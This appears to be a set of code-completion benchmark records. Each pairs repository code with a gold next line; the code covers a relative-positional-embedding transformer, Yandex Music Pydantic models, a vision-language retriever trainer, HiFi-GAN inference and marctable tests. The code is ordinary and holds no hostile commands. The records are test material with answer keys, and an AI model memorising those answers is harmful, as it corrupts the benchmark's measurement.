repo_name stringlengths 7 71 | file_path stringlengths 5 118 | context list | import_statement stringlengths 45 12.5k | token_num int64 641 99.4k | cropped_code stringlengths 44 17k | all_code stringlengths 43 754k | next_line stringlengths 2 330 | gold_snippet_index int64 0 68 | created_at stringlengths 25 25 | level stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|
NOrangeeroli/SecondPose | model/pcd_cross/modules/transformer/lrpe_transformer.py | [
{
"identifier": "build_dropout_layer",
"path": "model/pcd_cross/modules/layers/factory.py",
"snippet": "def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module:\n r\"\"\"Factory function for dropout layer.\"\"\"\n if p is None or p == 0:\n return nn.Identity()\n else:\n ... | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from ..layers import build_dropout_layer
from .output_layer import AttentionOutput
from .positional_embedding import LearnablePositionalEmbedding | 1,841 | Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout)
| r"""Transformer with Learnable Relative Positional Embeddings.
Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout) | self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn) | 1 | 2023-12-16 16:58:33+00:00 | 4k |
KatantDev/YMdantic | ymdantic/models/tracks/track.py | [
{
"identifier": "DeprecatedMixin",
"path": "ymdantic/mixins.py",
"snippet": "class DeprecatedMixin:\n \"\"\"Миксин, удаляющий устаревшие поля из модели.\"\"\"\n\n @model_validator(mode=\"before\")\n def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Удал... | from typing import List, Optional, Literal
from pydantic import HttpUrl
from ymdantic.mixins import DeprecatedMixin
from ymdantic.models.artists import Artist
from ymdantic.models.base import YMBaseModel
from ymdantic.models.chart_position import ChartPosition
from ymdantic.models.tracks.r128 import R128
from ymdantic.models.tracks.fade import Fade
from ymdantic.models.tracks.derived_colors import DerivedColors
from ymdantic.models.tracks.album import TrackAlbum
from ymdantic.models.tracks.lyrics_info import LyricsInfo
from ymdantic.models.tracks.major import Major
from ymdantic.models.tracks.download_info import DownloadInfo, DownloadInfoDirect | 3,249 |
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть)
|
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть) | r128: Optional[R128] = None | 4 | 2023-12-21 21:24:10+00:00 | 4k |
MMC-K/multimodal_understanding | training_retriever.py | [
{
"identifier": "DatasetForVLAlign",
"path": "data_utils.py",
"snippet": "class DatasetForVLAlign(Dataset):\n def __init__(\n self,\n file_path: str,\n image_tokenizer: ViTFeatureExtractor,\n text_tokenizer: AutoTokenizer,\n ... | import argparse
import os
import gc
import time
import json
import shutil
import logging
import functools
import numpy as np
import torch
import torch.nn.functional as F
import torch.distributed as dist
import torch.utils.data
import torch.utils.data.distributed
import torch.nn.parallel
from tqdm import tqdm
from torch.utils.data import DataLoader
from torch.nn import CrossEntropyLoss
from torch import optim
from torch.nn.parallel import DistributedDataParallel as DDP
from transformers import AutoTokenizer, ViTFeatureExtractor
from torch.utils.tensorboard import SummaryWriter
from data_utils import DatasetForVLAlign
from modeling_encoder import (
VisionT5SimpleBiEncoder,
VisionT5MeanBiEncoder,
VisionT5SimpleBiEncoderHN,
VisionT5MeanBiEncoderHN,
) | 3,363 | batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": {
| # Copyright 2022 san kim
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.getLogger(__name__)
def broadcast(tensors, rank=0):
rt = tensors.clone().detach()
torch.distributed.broadcast(rt, rank)
return rt
def reduce_tensor(tensor, args):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= args.world_size
return rt
def reduce_sum_tensor(tensor):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
return rt
def all_gather(tensors, args, **kwargs):
rt = tensors.clone().detach()
tensor_list = [torch.zeros_like(rt) for _ in range(args.world_size)]
torch.distributed.all_gather(tensor_list, rt)
return tensor_list
def compute_loss(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
# scores(diagonal): [batch_size, batch_size]
target = torch.arange(batch_size).to(outputs["language_repr"].device)
retrieve_loss = loss_fn(scores/args.logit_temperature, target) + loss_fn(scores.t()/args.logit_temperature, target)
return retrieve_loss
def compute_loss_over_device(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
language_repr = outputs["language_repr"]
vision_repr = outputs["vision_repr"]
batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": { | "model_cls": VisionT5MeanBiEncoderHN, | 4 | 2023-12-18 10:37:51+00:00 | 4k |
liuhuang31/hifigan-sr | inference.py | [
{
"identifier": "AttrDict",
"path": "env.py",
"snippet": "class AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self"
},
{
"identifier": "mel_spectrogram",
"path": "meldataset.py",
"snippet": "def... | import glob
import os
import librosa
import argparse
import json
import torch
from scipy.io.wavfile import write
from env import AttrDict
from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav
from models import Generator | 1,985 | from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data)
| from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data) | h = AttrDict(json_config) | 0 | 2023-12-16 01:21:00+00:00 | 4k |
edsu/marctable | test_marctable.py | [
{
"identifier": "MARC",
"path": "marctable/marc.py",
"snippet": "class MARC:\n def __init__(self) -> None:\n self.fields: List[Field] = []\n\n @cache\n def get_field(self, tag: str) -> Field:\n for field in self.fields:\n if field.tag == tag:\n return fie... | import json
import pathlib
import pandas
from io import StringIO
from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl
from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet
from pytest import raises | 2,512 | f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None:
|
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
